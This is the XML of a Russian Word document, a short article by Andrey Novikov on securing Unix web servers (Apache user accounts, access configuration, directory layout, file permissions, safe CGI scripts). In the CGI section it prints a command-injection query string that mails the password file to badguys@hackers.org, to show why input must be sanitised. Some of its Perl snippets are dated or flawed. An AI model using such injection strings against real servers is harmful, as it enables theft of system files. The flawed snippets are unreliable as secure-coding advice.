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417" w:rsidRPr="00041841" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Некоторые аспекты безопасности Веб-серверов на Unix платформах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51417" w:rsidRPr="00041841" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Андрей Новиков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Предисловие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 xml:space="preserve">Защищенность компьютера, на котором работает Веб-сервер, и данных, находящихся на этом компьютере, зависит от многих аспектов. Основными из них являются: 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 xml:space="preserve">Корректность настройки Веб-сервера. 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 xml:space="preserve">Корректность построения дерева файловой системы. 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 xml:space="preserve">Корректность установки прав доступа к файлам Веб-сервера. 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 xml:space="preserve">Правильное написание CGI сценариев и программ. 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Рассмотрим их по очереди.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Корректность настройки Веб-сервера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На безопасность работы Веб-сервера влияют некоторые настройки, устанавливаемые вами в файлах конфигурации. Я буду говорить в основном о сервере Apache, хотя все замечания в равной степени применимы и к другим серверам.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Прежде всего вам необходимо правильно выбрать пользователя, под которым будет работать Веб-сервер. Дело в том, что в Unix для того, чтобы подсоединиться к 80 порту, по умолчанию используемому в HTTP протоколе, Веб-серверу необходимо иметь права пользователя root. Но отвечать на запросы пользователей с такими правами очень не безопасно. Поэтому Веб-сервер порождает детей с правами другого пользователя, которые и обрабатывают запросы пользователей. В файле конфигурации (http.conf) необходимо указать имя пользователя, под которым будут запускаться дочерние процессы, и группу, к которой он принадлежит. В сервере Apache за это отвечают директивы User и Group.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Необходимо создать отдельного пользователя и группу, например apache и webstuff. Нельзя использовать предлагаемые по умолчанию nobody:nogroup - на некоторых системах это открывает "дыры" в защите. Ни в коем случае также нельзя запускать Веб-сервер из под пользователя webadmin, который обычно занимается всем этим хозяйством, т.к. он имеет права записи во все файлы (см. установку прав доступа к файлам). Обязательно запретите login для созданного вами пользователя.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Очень важным моментом в настройке Веб-сервера является настройка файла прав доступа (access.conf). Необходимо начать с корня дерева документов сервера и при необходимости конкретизировать установки ниже по дереву для отдельных подкаталогов. На мой взгляд более надежно использовать директиву , а не , т.к. она защищает конкретные наборы файлов, независимо от того, как вы к ним попали (ведь в серверах под Unix можно очень эффективно пользоваться линками к файлам и директориям, делая логическую структуру дерева документов более удобной). Если вы используете Alias, очень внимательно проанализируйте все возможные варианты построения логического дерева (пути к файлу).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С самого начала отмените директиву построения индексов (Option Indexes). Если вдруг пропадет файл index.html в каком-либо каталоге, сервер не построит список всех файлов в каталоге. Такой список в некоторых случаях может содержать нежелательные служебные файлы, которые пользователь не должен видеть. Обладание им открывает еще одну потенциальную "дыру". Несмотря на запрет индексирования помещайте в каждый каталог файл index.html хотя бы с пустым (это уже паранойя, но все же...).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Разрешайте серверу следовать символьным ссылкам только если вы действительно ими пользуетесь.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Для каталога /cgi-bin запретите все кроме ExecCGI. Проверьте, что скажет ваш сервер, если вы запросите http://www.server.dom/cgi-bin/. Он должен послать вас очень далеко, а не выдать список всех ваших сценариев!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Все служебные URL, такие как /server-status, /server-conf, должны быть открыты только для вашего доступа. При этом указывайте ваш IP адрес, а не hostname, т.к. hostname можно подделать, а IP адрес намного сложнее.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Корректность построения дерева файловой системы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Важно заранее очень хорошо продумать структуру каталогов. Ведь они отражают структуру вашего узла и менять потом все очень сложно. Учитывайте, что количество документов по одной теме будет все время расти. В каталоге не должно быть слишком много файлов. Это затрудняет их поиск, вы можете по ошибке что-то удалить, да и просто усложняет вам работу.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Очень важно, чтобы каталог с настройками, каталог с файлами регистрации (logs) и каталог со сценариями находились выше дерева документов. Доступ к каталогу сценариев должен осуществляться директивой ScriptAlias. Рекомендуется такая структура:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51417" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:t>site_____conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51417" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:t>|__logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51417" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:t>|__cgi-bin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|__htdocs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Очень аккуратно пользуйтесь связями, ведущими вне дерева документов. Старайтесь ссылаться только на отдельные файлы, а не на целые каталоги. Но если это нужно, то можно.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Корректность установки прав доступа к файлам Веб-сервера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Все файлы ниже каталога site не должны принадлежать пользователю, под которым работает сервер (apache), но должны принадлежать группе, в которую входит это пользователь (webstuff).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Обычно файлами владеет webadmin, также принадлежащий группе webstuff. Все каталоги и файлы должны создаваться с umask = 027, т.е. группа (читай - Веб-сервер) должна иметь только права на чтение и исполнение, а все остальные (не webadmin) не должны иметь никаких прав. Таким образом вам останется охранять только login root'а и webadmin'а.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Правильное написание CGI сценариев и программ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Одним из основных способов попасть в Ваш сервер, это воспользоваться неправильно написанным сценарием. Существует большое количество книг по безопасным сценариям. Я опишу только основные моменты.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Первым способом нарушить работу сценария является переполнение буфера ввода. Никогда не указывайте размер буфера исходя из разумных соображений. Определяйте его динамически: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read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});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Неплохо также перед этим проверить $ENV{'CONTENT_LENGTH'} и уменьшить ее до некоего разумного предела.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Вторым важным моментом является внедрение команд ОС в возвращаемые сценарию переменные. Возьмем пример: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Пусть у на в сценарии будет строка (@usernames - массив имен)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system "finger @usernames 2&gt;&amp;1";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Если мы вызовем такой сценарий строкой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00041841">
        <w:t>http://www.yoursite.ru/cgi-bin/bad_finger.pl?andy+bob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то все будет замечательно. Но, если его вызвать строкой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00041841">
        <w:t>http://www.yoursite.ru/cgi-bin/bad_finger.pl?`mail+badguys@hackers.org+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00041841">
        <w:t>то ваш файл паролей улетит к "нехорошим парням".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В связи с этим только в крайних случаях используйте такие команды, как system(), exec() и eval(). Всегда проверяйте значения переменных на наличие метасимволов и удаляйте их. Например так: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$value =~ tr/'"\t\n\r\/&lt;&gt;|;//d;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$value =~ s///g;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Ну а самым надежным способом является проверка каждого поля на точный шаблон данных, которые вы ожидаете получить. Например, если вы запросили почтовый индекс, проверьте его строкой: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$zip =~ /^\d{6}$/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а если запросили адрес электронной почты, строкой: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$email=~s#(\w+(-|\.|))+@(\w+(-|\.|))+(ru|su|be|ca|cz|ee|fi)##io;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Заключение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51417" w:rsidRPr="00041841" w:rsidRDefault="00A51417" w:rsidP="00A51417">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00041841">
        <w:t>Следуя этим нехитрым правилам вы значительно обезопасите ваш сервер от поползновений "нехороших парней", как их мило называют в зарубежной литературе. Главное, это помнить основной принцип обеспечения безопасности - запретите ВСЕ, а потом разрешайте только то, что Вам ДЕЙСТВИТЕЛЬНО необходимо.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1417"/>
    <w:rsid w:val="00041841"/>
    <w:rsid w:val="00051FB8"/>
    <w:rsid w:val="00095BA6"/>
    <w:rsid w:val="00210DB3"/>
    <w:rsid w:val="00240ADC"/>
    <w:rsid w:val="00303A54"/>
    <w:rsid w:val="0031418A"/>
    <w:rsid w:val="00350B15"/>
    <w:rsid w:val="00377A3D"/>
    <w:rsid w:val="00513FAD"/>
    <w:rsid w:val="0052086C"/>
    <w:rsid w:val="005A2562"/>
    <w:rsid w:val="005B3906"/>
    <w:rsid w:val="00755964"/>
    <w:rsid w:val="008C19D7"/>
    <w:rsid w:val="00A44D32"/>
    <w:rsid w:val="00A51417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CBF36E2-0E79-4DAD-8BD6-D0C523F6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1417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A514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1022</Words>
  <Characters>5826</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>48</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Home</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6835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Некоторые аспекты безопасности Веб-серверов на Unix платформах</dc:title>
  <dc:subject/>
  <dc:creator>Alena</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-02-19T21:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-19T21:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>